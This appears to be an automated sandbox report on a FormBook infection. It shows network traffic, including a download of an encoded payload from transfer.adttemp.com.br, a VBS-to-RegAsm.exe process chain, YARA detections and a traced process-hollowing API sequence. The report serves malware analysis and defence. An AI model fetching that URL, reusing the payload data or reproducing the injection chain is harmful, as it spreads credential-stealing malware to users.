                Oct 10, 2024 12:22:56.151197910 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.151262045 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.151281118 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.151338100 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.151350021 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.151591063 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.151655912 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.151694059 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.151750088 CEST44349163104.196.109.209192.168.2.22
                Oct 10, 2024 12:22:56.151804924 CEST49163443192.168.2.22104.196.109.209
                Oct 10, 2024 12:22:56.214586973 CEST49163443192.168.2.22104.196.109.209
                TimestampSource PortDest PortSource IPDest IP
                Oct 10, 2024 12:22:54.797350883 CEST5456253192.168.2.228.8.8.8
                Oct 10, 2024 12:22:54.815954924 CEST53545628.8.8.8192.168.2.22
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 10, 2024 12:22:54.797350883 CEST192.168.2.228.8.8.80x684cStandard query (0)transfer.adttemp.com.brA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 10, 2024 12:22:54.815954924 CEST8.8.8.8192.168.2.220x684cNo error (0)transfer.adttemp.com.br104.196.109.209A (IP address)IN (0x0001)false
                • transfer.adttemp.com.br
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.2249163104.196.109.2094433316C:\Users\user\AppData\Local\Temp\temp_executable.exe
                TimestampBytes transferredDirectionData
                2024-10-10 10:22:55 UTC93OUTGET /hUkry/sirdeeeeee.txt HTTP/1.1
                Host: transfer.adttemp.com.br
                Connection: Keep-Alive
                2024-10-10 10:22:55 UTC313INHTTP/1.1 200 OK
                Date: Thu, 10 Oct 2024 10:22:55 GMT
                Server: Transfer.sh HTTP Server 1.0
                Content-Disposition: attachment; filename="sirdeeeeee.txt"
                Content-Length: 382988
                Content-Type: text/plain; charset=utf-8
                X-Made-With: <3 by DutchCoders
                X-Served-By: Proudly served by DutchCoders
                Connection: close
                2024-10-10 10:22:55 UTC7687INData Raw: 4d 4a 56 4a 41 56 77 38 64 63 38 7a 6e 63 4b 76 78 58 46 52 6b 7a 37 33 44 35 46 72 77 52 41 6a 69 35 6e 72 33 66 69 73 2b 39 6d 4f 55 49 54 32 2f 67 66 41 41 6d 68 6b 4d 51 33 67 6c 70 36 66 67 4f 39 4e 44 38 41 6d 50 6e 4b 49 79 4b 6d 46 54 65 36 4f 37 41 4a 45 76 79 74 66 61 34 75 32 48 4f 63 52 6e 72 68 44 68 34 7a 64 37 4b 66 51 2b 30 43 51 4c 61 4a 70 54 39 7a 4f 30 50 38 71 52 4f 51 7a 4d 76 41 70 6f 6f 49 42 43 2f 76 74 63 50 2b 43 2f 35 2f 41 55 45 75 64 6a 76 73 2f 4d 57 78 65 36 4a 6c 44 46 45 43 34 2b 6f 31 6a 4b 62 33 66 41 45 53 49 4f 63 47 78 56 59 75 65 56 6e 4b 5a 52 65 78 56 5a 52 70 58 70 50 34 4c 48 6e 34 74 2f 6b 74 52 41 6b 50 30 77 77 42 70 37 75 67 71 76 55 4e 36 4a 73 37 30 48 78 56 56 4e 75 4f 73 78 34 54 4c 48 34 5a 49 73 4a 42
                Data Ascii: MJVJAVw8dc8zncKvxXFRkz73D5FrwRAji5nr3fis+9mOUIT2/gfAAmhkMQ3glp6fgO9ND8AmPnKIyKmFTe6O7AJEvytfa4u2HOcRnrhDh4zd7KfQ+0CQLaJpT9zO0P8qROQzMvApooIBC/vtcP+C/5/AUEudjvs/MWxe6JlDFEC4+o1jKb3fAESIOcGxVYueVnKZRexVZRpXpP4LHn4t/ktRAkP0wwBp7ugqvUN6Js70HxVVNuOsx4TLH4ZIsJB
                2024-10-10 10:22:55 UTC505INData Raw: 39 65 74 4d 70 32 4a 39 49 44 4f 41 68 59 42 39 59 55 31 49 56 35 53 42 6e 78 58 78 4b 57 4b 69 67 65 78 7a 64 39 2f 6c 39 37 63 4f 6e 70 73 32 77 58 32 71 46 4c 58 46 61 33 58 2b 61 41 58 53 77 32 52 39 6c 66 71 47 54 66 47 6f 63 41 61 55 38 70 38 6a 79 74 78 67 71 6b 35 51 47 74 41 61 70 37 6f 42 64 63 79 48 4e 51 43 54 70 53 37 79 2b 39 79 39 48 66 4b 65 37 36 77 6e 35 65 49 73 39 56 77 37 6d 54 75 64 78 78 56 51 61 6e 6a 37 54 55 6b 33 4e 42 4a 76 34 46 6c 4e 33 54 6e 65 4e 4e 46 71 79 4c 45 36 58 70 4b 69 54 62 36 38 74 56 4e 63 6c 52 34 46 45 52 43 37 6c 4f 6a 77 75 2b 68 4e 55 31 78 5a 41 72 6c 7a 48 34 67 64 78 4c 46 43 46 63 56 59 34 57 43 64 67 45 47 78 76 4b 6d 65 39 30 68 4d 75 50 48 5a 55 44 73 74 79 4e 32 77 63 7a 46 4c 6c 66 57 59 4d 65 69
                Data Ascii: 9etMp2J9IDOAhYB9YU1IV5SBnxXxKWKigexzd9/l97cOnps2wX2qFLXFa3X+aAXSw2R9lfqGTfGocAaU8p8jytxgqk5QGtAap7oBdcyHNQCTpS7y+9y9HfKe76wn5eIs9Vw7mTudxxVQanj7TUk3NBJv4FlN3TneNNFqyLE6XpKiTb68tVNclR4FERC7lOjwu+hNU1xZArlzH4gdxLFCFcVY4WCdgEGxvKme90hMuPHZUDstyN2wczFLlfWYMei
                2024-10-10 10:22:55 UTC7495INData Raw: 4e 2f 4e 79 4c 44 41 36 34 69 62 41 39 62 32 70 4c 76 6f 59 76 43 34 35 55 45 55 31 6f 7a 44 39 36 2f 66 53 32 35 7a 74 62 7a 48 34 4b 6e 52 47 2b 51 56 67 56 54 78 52 45 75 4b 64 47 4e 76 6b 32 59 55 54 2b 4e 57 52 63 49 32 79 6f 68 57 71 51 78 77 56 52 6b 41 61 50 36 2b 68 4e 42 57 65 33 4f 43 65 71 62 62 5a 49 54 50 33 77 6a 77 43 54 72 54 64 52 79 49 76 61 66 61 35 33 70 76 55 37 34 43 71 44 79 30 53 76 77 56 79 77 77 2b 74 33 4d 74 7a 62 4e 43 30 54 2f 6e 45 56 5a 57 32 4c 77 46 7a 33 42 6c 70 66 4d 64 49 6e 56 4d 79 37 53 42 41 38 51 6e 48 59 6f 37 41 39 4c 4b 38 38 6a 6f 75 30 70 32 45 2f 63 4b 45 78 48 50 38 46 67 74 4c 71 6b 58 52 4e 50 63 49 52 4a 45 72 61 54 4e 52 44 6c 79 65 51 68 43 71 6c 56 73 32 6a 43 6d 34 48 6a 77 49 2f 45 38 7a 77 30 30
                Data Ascii: N/NyLDA64ibA9b2pLvoYvC45UEU1ozD96/fS25ztbzH4KnRG+QVgVTxREuKdGNvk2YUT+NWRcI2yohWqQxwVRkAaP6+hNBWe3OCeqbbZITP3wjwCTrTdRyIvafa53pvU74CqDy0SvwVyww+t3MtzbNC0T/nEVZW2LwFz3BlpfMdInVMy7SBA8QnHYo7A9LK88jou0p2E/cKExHP8FgtLqkXRNPcIRJEraTNRDlyeQhCqlVs2jCm4HjwI/E8zw00
                2024-10-10 10:22:55 UTC697INData Raw: 58 45 36 56 67 63 79 54 57 63 61 63 32 32 59 4b 38 4e 4f 35 35 4d 6b 45 48 4f 2f 45 49 68 61 5a 70 2f 47 74 6a 39 4d 45 6b 35 38 66 70 56 2b 37 52 6e 51 46 49 57 71 35 2f 51 4e 2f 2b 6e 6a 55 36 6a 44 49 68 71 6f 4b 33 58 41 46 72 4a 35 64 67 78 62 69 75 62 72 6a 61 42 4b 79 58 66 4d 62 51 57 65 4b 70 49 7a 39 74 52 37 4d 4e 34 34 65 42 43 79 79 43 36 41 69 33 39 63 42 46 4b 72 69 41 35 63 32 52 4d 54 67 4a 4f 67 65 44 4a 70 39 34 36 46 55 44 42 46 4d 46 65 41 67 32 77 66 69 78 30 44 5a 4a 65 56 63 71 31 61 36 5a 65 65 74 55 38 6d 49 34 6b 49 77 68 37 72 31 69 32 2b 55 2f 56 4c 6e 54 34 79 71 55 57 4d 32 45 6c 50 45 50 6f 48 38 66 62 6f 32 6c 52 64 4e 50 45 6b 71 38 61 4b 75 33 31 4d 50 48 70 56 74 69 7a 50 71 46 2b 39 46 39 6b 4a 2b 31 74 7a 69 35 57 4c
                Data Ascii: XE6VgcyTWcac22YK8NO55MkEHO/EIhaZp/Gtj9MEk58fpV+7RnQFIWq5/QN/+njU6jDIhqoK3XAFrJ5dgxbiubrjaBKyXfMbQWeKpIz9tR7MN44eBCyyC6Ai39cBFKriA5c2RMTgJOgeDJp946FUDBFMFeAg2wfix0DZJeVcq1a6ZeetU8mI4kIwh7r1i2+U/VLnT4yqUWM2ElPEPoH8fbo2lRdNPEkq8aKu31MPHpVtizPqF+9F9kJ+1tzi5WL
                2024-10-10 10:22:55 UTC7303INData Raw: 50 57 33 6b 6e 55 75 77 76 78 6d 77 62 4a 50 4f 53 49 77 42 42 55 4c 4e 74 63 4f 6a 44 57 33 42 54 6f 6e 4e 70 63 6e 57 70 37 37 45 34 51 71 62 58 77 65 76 43 62 52 30 7a 64 61 56 34 4f 75 63 67 41 61 79 45 39 62 58 6f 48 70 57 62 57 48 4b 73 34 32 48 6c 32 6d 6b 49 59 33 61 55 38 4d 73 30 46 51 4a 67 33 69 51 4b 35 57 4b 38 39 4a 79 63 59 62 69 46 57 56 46 37 4c 78 54 45 62 68 70 62 4c 4e 6a 73 32 77 56 39 7a 64 2b 63 55 35 37 67 71 37 36 62 49 6b 63 39 49 73 4a 74 54 71 71 38 35 68 74 53 33 63 6e 32 5a 70 70 33 6f 6c 34 47 76 41 6f 62 58 73 75 70 47 75 37 4b 57 62 64 56 64 34 52 36 58 62 42 79 79 6e 50 7a 4b 64 64 7a 54 39 71 37 38 34 68 41 4f 46 51 79 67 2b 69 61 56 59 31 42 69 34 45 5a 62 75 59 49 53 33 4b 61 48 58 52 6f 50 4e 44 2b 57 50 35 48 6f 44
                Data Ascii: PW3knUuwvxmwbJPOSIwBBULNtcOjDW3BTonNpcnWp77E4QqbXwevCbR0zdaV4OucgAayE9bXoHpWbWHKs42Hl2mkIY3aU8Ms0FQJg3iQK5WK89JycYbiFWVF7LxTEbhpbLNjs2wV9zd+cU57gq76bIkc9IsJtTqq85htS3cn2Zpp3ol4GvAobXsupGu7KWbdVd4R6XbByynPzKddzT9q784hAOFQyg+iaVY1Bi4EZbuYIS3KaHXRoPND+WP5HoD
                2024-10-10 10:22:55 UTC889INData Raw: 6b 4d 6c 69 64 75 69 34 41 52 43 4e 41 6d 6e 2f 44 6e 54 46 58 6b 47 46 79 4d 68 66 6f 78 7a 6d 45 66 6a 6e 78 33 55 4a 36 41 34 4e 76 39 35 37 4a 45 50 64 31 6e 62 73 6f 68 4e 38 6c 77 6f 77 4c 6c 5a 71 70 63 68 41 34 38 55 59 39 6f 4c 35 75 6d 74 69 39 52 6d 6a 33 39 37 50 48 34 31 35 47 70 69 35 38 4e 32 4f 6a 4e 6d 58 39 53 5a 67 4e 6c 33 43 6d 2f 38 45 47 77 4e 4f 73 4a 42 55 74 52 67 57 46 65 67 43 4a 76 79 4c 6d 31 48 62 61 69 56 46 36 70 52 30 34 4a 45 6c 34 39 53 68 57 58 4a 54 7a 6b 75 79 58 36 38 61 44 36 37 64 34 30 46 78 67 4e 74 33 4d 54 61 51 35 79 7a 50 69 66 76 6b 47 66 41 6c 79 4a 59 50 75 2f 71 49 56 41 6f 78 6d 39 6e 69 63 45 6f 42 4c 56 4b 42 6c 72 4e 62 79 4d 65 76 43 47 30 63 59 46 6f 43 46 4f 56 2f 47 46 52 31 35 62 4b 79 62 72 55
                Data Ascii: kMlidui4ARCNAmn/DnTFXkGFyMhfoxzmEfjnx3UJ6A4Nv957JEPd1nbsohN8lwowLlZqpchA48UY9oL5umti9Rmj397PH415Gpi58N2OjNmX9SZgNl3Cm/8EGwNOsJBUtRgWFegCJvyLm1HbaiVF6pR04JEl49ShWXJTzkuyX68aD67d40FxgNt3MTaQ5yzPifvkGfAlyJYPu/qIVAoxm9nicEoBLVKBlrNbyMevCG0cYFoCFOV/GFR15bKybrU
                2024-10-10 10:22:55 UTC7111INData Raw: 4c 6e 41 63 76 53 7a 68 56 43 30 72 47 79 67 5a 65 44 38 42 70 4c 48 73 6a 59 2f 53 75 51 2b 6e 55 6f 47 36 63 2b 63 31 79 31 6c 51 64 38 67 4e 69 66 41 73 78 72 75 34 6f 43 4d 69 30 7a 76 34 69 32 33 6e 36 4f 7a 63 44 62 79 4b 35 58 4f 34 39 6f 79 47 6b 47 34 58 44 34 78 42 50 36 44 7a 67 61 67 41 6d 50 79 31 78 54 39 47 45 4f 73 68 38 54 78 51 59 74 5a 59 74 79 51 4b 4b 48 2b 39 44 53 56 34 5a 4e 30 6b 69 53 61 79 43 6c 77 4e 56 56 65 68 2f 73 35 33 72 73 67 55 53 36 75 34 43 75 37 57 74 77 42 75 75 42 78 64 76 42 57 54 4a 42 72 47 6e 49 38 62 33 79 68 36 6b 52 43 35 48 7a 44 44 2b 6e 74 39 43 78 47 51 70 4e 6d 55 71 69 68 54 53 41 44 57 4e 68 31 76 30 33 61 49 2b 30 35 58 42 49 55 56 34 35 5a 61 55 70 4d 53 59 6d 69 4c 66 33 61 69 2b 6f 6a 6d 63 70 52
                Data Ascii: LnAcvSzhVC0rGygZeD8BpLHsjY/SuQ+nUoG6c+c1y1lQd8gNifAsxru4oCMi0zv4i23n6OzcDbyK5XO49oyGkG4XD4xBP6DzgagAmPy1xT9GEOsh8TxQYtZYtyQKKH+9DSV4ZN0kiSayClwNVVeh/s53rsgUS6u4Cu7WtwBuuBxdvBWTJBrGnI8b3yh6kRC5HzDD+nt9CxGQpNmUqihTSADWNh1v03aI+05XBIUV45ZaUpMSYmiLf3ai+ojmcpR
                2024-10-10 10:22:55 UTC1081INData Raw: 56 6e 39 74 61 43 77 42 7a 69 36 55 33 71 70 48 38 4c 4e 54 4f 6d 47 31 2b 63 4b 67 66 4c 78 77 6d 63 78 49 68 37 58 4b 6a 2b 5a 30 58 6f 4b 68 47 56 36 49 68 4f 63 5a 52 39 72 44 68 48 75 5a 5a 7a 53 64 36 62 79 2f 61 77 55 4a 75 2f 4a 30 33 75 53 73 4b 69 4d 31 7a 61 35 62 63 47 46 62 59 6b 35 7a 7a 68 46 47 36 72 48 48 32 55 53 6a 6f 45 2b 6d 76 41 32 47 54 56 4c 76 65 50 6b 65 4a 61 58 75 33 43 30 32 30 7a 6c 6b 31 70 59 79 77 76 57 73 35 6c 62 47 51 33 54 65 38 61 47 6d 42 39 39 6a 4f 76 43 7a 49 70 49 66 55 35 6f 38 4a 6b 68 74 72 68 38 70 61 55 4d 61 58 77 49 74 67 51 30 4d 41 6e 53 56 2b 6e 2f 6e 4d 47 67 72 61 51 71 36 51 58 6f 42 47 33 64 50 53 32 6d 45 71 77 7a 69 6d 41 78 59 74 44 4c 32 38 47 54 42 35 5a 4c 6a 75 62 6a 75 6e 53 55 77 43 64 65
                Data Ascii: Vn9taCwBzi6U3qpH8LNTOmG1+cKgfLxwmcxIh7XKj+Z0XoKhGV6IhOcZR9rDhHuZZzSd6by/awUJu/J03uSsKiM1za5bcGFbYk5zzhFG6rHH2USjoE+mvA2GTVLvePkeJaXu3C020zlk1pYywvWs5lbGQ3Te8aGmB99jOvCzIpIfU5o8Jkhtrh8paUMaXwItgQ0MAnSV+n/nMGgraQq6QXoBG3dPS2mEqwzimAxYtDL28GTB5ZLjubjunSUwCde
                2024-10-10 10:22:55 UTC6919INData Raw: 58 58 52 35 37 37 38 32 58 66 37 2f 32 2f 6d 49 4a 48 68 50 32 68 2b 54 44 74 74 70 46 4b 2f 6c 2b 77 32 41 45 76 33 4c 79 4b 63 53 76 70 36 59 34 39 72 4f 53 36 58 62 4e 69 33 36 38 2f 6e 4f 63 54 31 78 53 4e 41 6a 70 67 46 77 69 6a 6b 4c 4d 34 41 51 52 6a 56 57 63 48 5a 69 35 54 77 56 36 56 34 68 33 62 35 6a 4a 59 6e 49 37 6e 39 4b 55 6a 76 36 71 66 5a 6d 4a 51 2b 33 69 68 67 77 41 58 66 79 35 6f 6a 49 76 45 2f 57 68 6a 66 7a 6c 4d 75 4c 35 62 62 44 4d 30 65 6f 72 4a 48 36 72 39 73 73 37 38 38 4b 76 37 73 46 66 6d 56 35 78 70 4d 33 53 4e 72 38 47 31 43 68 36 38 32 58 42 34 47 76 73 54 52 6d 68 44 39 73 2f 66 76 4b 6d 4f 2b 79 65 57 4f 67 6d 71 30 43 58 48 54 69 34 48 70 7a 6b 6c 63 39 62 7a 37 2b 62 6b 70 73 45 51 54 57 31 6d 68 47 4d 4c 4c 75 6b 42 30
                Data Ascii: XXR57782Xf7/2/mIJHhP2h+TDttpFK/l+w2AEv3LyKcSvp6Y49rOS6XbNi368/nOcT1xSNAjpgFwijkLM4AQRjVWcHZi5TwV6V4h3b5jJYnI7n9KUjv6qfZmJQ+3ihgwAXfy5ojIvE/WhjfzlMuL5bbDM0eorJH6r9ss788Kv7sFfmV5xpM3SNr8G1Ch682XB4GvsTRmhD9s/fvKmO+yeWOgmq0CXHTi4Hpzklc9bz7+bkpsEQTW1mhGMLLukB0
                2024-10-10 10:22:55 UTC1273INData Raw: 4b 31 57 4a 7a 74 44 79 39 50 45 43 59 33 54 30 4a 36 73 7a 77 79 6f 71 66 2b 2b 76 6d 51 35 79 41 6e 59 6c 6c 33 6e 30 32 6b 67 48 64 6e 76 74 67 73 2f 33 4e 59 43 66 48 49 49 36 6d 35 76 61 4c 42 71 2f 6b 43 65 2b 6d 4e 73 46 45 32 59 66 63 68 67 55 4a 52 42 62 6f 74 4b 75 72 77 58 6a 57 38 76 35 4f 71 32 6b 51 65 32 76 67 76 55 71 30 47 2b 31 71 77 38 58 56 32 47 6d 4a 36 6b 73 72 6c 42 54 76 4c 77 45 66 76 72 39 30 56 50 34 38 76 74 4b 37 62 6e 4e 69 39 44 47 38 2b 6f 45 47 79 41 78 6d 59 46 57 4a 31 34 4d 62 73 69 45 58 76 36 61 43 68 53 76 36 4d 6b 57 2b 6b 68 78 5a 4b 50 4e 39 36 34 4b 47 6e 47 38 6f 4d 66 34 73 69 43 52 75 64 4e 4c 73 34 72 4e 4e 33 6f 6e 33 73 6d 48 41 54 4a 6f 57 57 49 79 42 49 51 64 78 61 50 6b 36 54 6d 75 56 67 6b 4c 74 56 65
                Data Ascii: K1WJztDy9PECY3T0J6szwyoqf++vmQ5yAnYll3n02kgHdnvtgs/3NYCfHII6m5vaLBq/kCe+mNsFE2YfchgUJRBbotKurwXjW8v5Oq2kQe2vgvUq0G+1qw8XV2GmJ6ksrlBTvLwEfvr90VP48vtK7bnNi9DG8+oEGyAxmYFWJ14MbsiEXv6aChSv6MkW+khxZKPN964KGnG8oMf4siCRudNLs4rNN3on3smHATJoWWIyBIQdxaPk6TmuVgkLtVe


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:06:22:51
                Start date:10/10/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\KjFT0qPTo4.vbs"
                Imagebase:0xff960000
                File size:168'960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:2
                Start time:06:22:53
                Start date:10/10/2024
                Path:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
                Imagebase:0x12f0000
                File size:72'704 bytes
                MD5 hash:12E3B467C52A663A7B6F61AF61B63A11
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 100%, Joe Sandbox ML
                Reputation:low
                Has exited:true

                Target ID:3
                Start time:06:22:55
                Start date:10/10/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Imagebase:0xeb0000
                File size:64'704 bytes
                MD5 hash:8FE9545E9F72E460723F484C304314AD
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.455484382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.455450302.0000000000270000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:true

                Reset < >

                  Execution Graph

                  Execution Coverage:19.3%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:24.6%
                  Total number of Nodes:57
                  Total number of Limit Nodes:1
                  execution_graph 3346 2c7d70 3347 2c7d94 3346->3347 3351 2ca396 3347->3351 3371 2c9970 3347->3371 3348 2c7f53 3352 2c9a47 3351->3352 3369 2ca333 3352->3369 3391 2c962c 3352->3391 3354 2c9b8d 3355 2c9638 Wow64SetThreadContext 3354->3355 3356 2c9c91 3354->3356 3355->3356 3357 2c9650 ReadProcessMemory 3356->3357 3358 2c9d6f 3357->3358 3359 2c9668 VirtualAllocEx 3358->3359 3361 2c9ebe 3359->3361 3360 2c9674 WriteProcessMemory 3368 2c9f4a 3360->3368 3361->3360 3362 2ca16a 3363 2c9674 WriteProcessMemory 3362->3363 3364 2ca1b0 3363->3364 3366 2c9680 Wow64SetThreadContext 3364->3366 3370 2ca28a 3364->3370 3365 2c9674 WriteProcessMemory 3365->3368 3366->3370 3367 2c9698 ResumeThread 3367->3369 3368->3362 3368->3365 3369->3348 3370->3367 3372 2c99a0 3371->3372 3373 2c962c CreateProcessA 3372->3373 3389 2ca333 3372->3389 3374 2c9b8d 3373->3374 3377 2c9c91 3374->3377 3415 2c9638 3374->3415 3395 2c9650 3377->3395 3378 2c9d6f 3399 2c9668 3378->3399 3381 2c9ebe 3403 2c9674 3381->3403 3382 2ca16a 3383 2c9674 WriteProcessMemory 3382->3383 3384 2ca1b0 3383->3384 3390 2ca28a 3384->3390 3407 2c9680 3384->3407 3385 2c9674 WriteProcessMemory 3388 2c9f4a 3385->3388 3388->3382 3388->3385 3389->3348 3411 2c9698 3390->3411 3392 2ca470 CreateProcessA 3391->3392 3394 2ca70e 3392->3394 3396 2ca980 ReadProcessMemory 3395->3396 3398 2caa0e 3396->3398 3398->3378 3400 2caa50 VirtualAllocEx 3399->3400 3402 2caaca 3400->3402 3402->3381 3404 2caf08 WriteProcessMemory 3403->3404 3406 2cafa4 3404->3406 3406->3388 3408 2ca8b8 Wow64SetThreadContext 3407->3408 3410 2ca93e 3408->3410 3410->3390 3412 2cafe8 ResumeThread 3411->3412 3414 2cb056 3412->3414 3414->3389 3416 2ca8b8 Wow64SetThreadContext 3415->3416 3418 2ca93e 3416->3418 3418->3377

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 140 2c9970-2c999e 141 2c99a5-2c9a1a 140->141 142 2c99a0 140->142 143 2c9a35-2c9a39 141->143 142->141 144 2c9a1c-2c9a2e 143->144 145 2c9a3b-2ca3e4 143->145 144->143 146 2c9a30 144->146 148 2ca3ea-2ca3f1 145->148 149 2c9a47-2c9ba7 call 2c19f8 call 2c962c 145->149 146->143 162 2c9ba9-2c9bd8 call 2c1a60 149->162 163 2c9be3-2c9c49 149->163 162->163 171 2c9c4b 163->171 172 2c9c50-2c9c76 163->172 171->172 174 2c9c7c-2c9c9e call 2c9638 172->174 175 2c9d26-2c9d30 172->175 181 2c9cd0-2c9cd2 174->181 182 2c9ca0-2c9cce call 2c9644 174->182 177 2c9d37-2c9d8f call 2c9650 175->177 178 2c9d32 175->178 186 2c9dce-2c9de7 177->186 187 2c9d91-2c9dc3 call 2c1a60 177->187 178->177 185 2c9cd8-2c9ce6 181->185 182->185 189 2c9ce8-2c9d1a call 2c1a60 185->189 190 2c9d25 185->190 192 2c9de9-2c9e1b call 2c965c 186->192 193 2c9e5b-2c9ee4 call 2c9668 186->193 187->186 189->190 190->175 200 2c9e1d-2c9e4f call 2c1a60 192->200 201 2c9e5a 192->201 211 2c9ee6-2c9f18 call 2c1a60 193->211 212 2c9f23-2c9f6a call 2c9674 193->212 200->201 201->193 211->212 219 2c9f6c-2c9f9e call 2c1a60 212->219 220 2c9fa9-2c9fdb 212->220 219->220 226 2ca148-2ca164 220->226 227 2ca16a-2ca1d0 call 2c9674 226->227 228 2c9fe0-2ca05e 226->228 236 2ca20f-2ca23d 227->236 237 2ca1d2-2ca204 call 2c1a60 227->237 241 2ca13d-2ca142 228->241 242 2ca064-2ca0d8 call 2c9674 228->242 244 2ca23f 236->244 245 2ca244-2ca26f 236->245 237->236 241->226 256 2ca0dd-2ca0fd 242->256 244->245 250 2ca325-2ca32e call 2c9698 245->250 251 2ca275-2ca285 call 2c9680 245->251 258 2ca333-2ca353 250->258 257 2ca28a-2ca297 251->257 259 2ca13c 256->259 260 2ca0ff-2ca131 call 2c1a60 256->260 261 2ca2c9-2ca2cb 257->261 262 2ca299-2ca2c7 call 2c968c 257->262 263 2ca355-2ca387 call 2c1a60 258->263 264 2ca392-2ca3c8 258->264 259->241 260->259 269 2ca2d1-2ca2e5 261->269 262->269 263->264 264->148 273 2ca324 269->273 274 2ca2e7-2ca319 call 2c1a60 269->274 273->250 274->273
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID: (
                  • API String ID: 3559483778-3887548279
                  • Opcode ID: b58632924d49a6476f309fd792e2797273a81b90be7caab8de7b3c17c3ce8b1e
                  • Instruction ID: 404894af775fe1d70f563735a1c09e9cfb1f3e0bc3311c6e616b876116175854
                  • Opcode Fuzzy Hash: b58632924d49a6476f309fd792e2797273a81b90be7caab8de7b3c17c3ce8b1e
                  • Instruction Fuzzy Hash: 5B52CD75E112288FDB64DF69C885BDDBBB2AF89300F1482EAD409A7255DB309EC5CF41
                  Memory Dump Source
                  • Source File: 00000002.00000002.369860906.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_2c0000_temp_executable.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 368cbcb76a6eaf91f3d9d80bc6d1767fda688cb7f58c24396d4dfd9eb227fab4
                  • Instruction ID: 6df6fccbf7f55ff0715354450270712a28c99d9adb971210417ba5ed4539dbd5
                  • Opcode Fuzzy Hash: 368cbcb76a6eaf91f3d9d80bc6d1767fda688cb7f58c24396d4dfd9eb227fab4
                  • Instruction Fuzzy Hash: D7D1B174E11209CFCB14CFA9C884AEDBBF1BF89314F149669D409AB365DB70A986CF50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 17 2ca464-2ca505 19 2ca559-2ca579 17->19 20 2ca507-2ca52c 17->20 24 2ca5cd-2ca5fe 19->24 25 2ca57b-2ca5a0 19->25 20->19 23 2ca52e-2ca530 20->23 26 2ca532-2ca53c 23->26 27 2ca553-2ca556 23->27 34 2ca655-2ca70c CreateProcessA 24->34 35 2ca600-2ca628 24->35 25->24 32 2ca5a2-2ca5a4 25->32 29 2ca53e 26->29 30 2ca540-2ca54f 26->30 27->19 29->30 30->30 33 2ca551 30->33 36 2ca5a6-2ca5b0 32->36 37 2ca5c7-2ca5ca 32->37 33->27 47 2ca70e-2ca714 34->47 48 2ca715-2ca790 34->48 35->34 43 2ca62a-2ca62c 35->43 38 2ca5b4-2ca5c3 36->38 39 2ca5b2 36->39 37->24 38->38 42 2ca5c5 38->42 39->38 42->37 45 2ca62e-2ca638 43->45 46 2ca64f-2ca652 43->46 49 2ca63c-2ca64b 45->49 50 2ca63a 45->50 46->34 47->48 60 2ca7a0-2ca7a4 48->60 61 2ca792-2ca796 48->61 49->49 51 2ca64d 49->51 50->49 51->46 63 2ca7b4-2ca7b8 60->63 64 2ca7a6-2ca7aa 60->64 61->60 62 2ca798-2ca79b call 2c0fd0 61->62 62->60 65 2ca7c8-2ca7cc 63->65 66 2ca7ba-2ca7be 63->66 64->63 68 2ca7ac-2ca7af call 2c0fd0 64->68 70 2ca7de-2ca7e5 65->70 71 2ca7ce-2ca7d4 65->71 66->65 69 2ca7c0-2ca7c3 call 2c0fd0 66->69 68->63 69->65 74 2ca7fc 70->74 75 2ca7e7-2ca7f6 70->75 71->70 77 2ca7fd 74->77 75->74 77->77
                  APIs
                  • CreateProcessA.KERNEL32(?,?,00000005,?,?,?,?,?,?,?), ref: 002CA6F9
                  Strings
                  Memory Dump Source
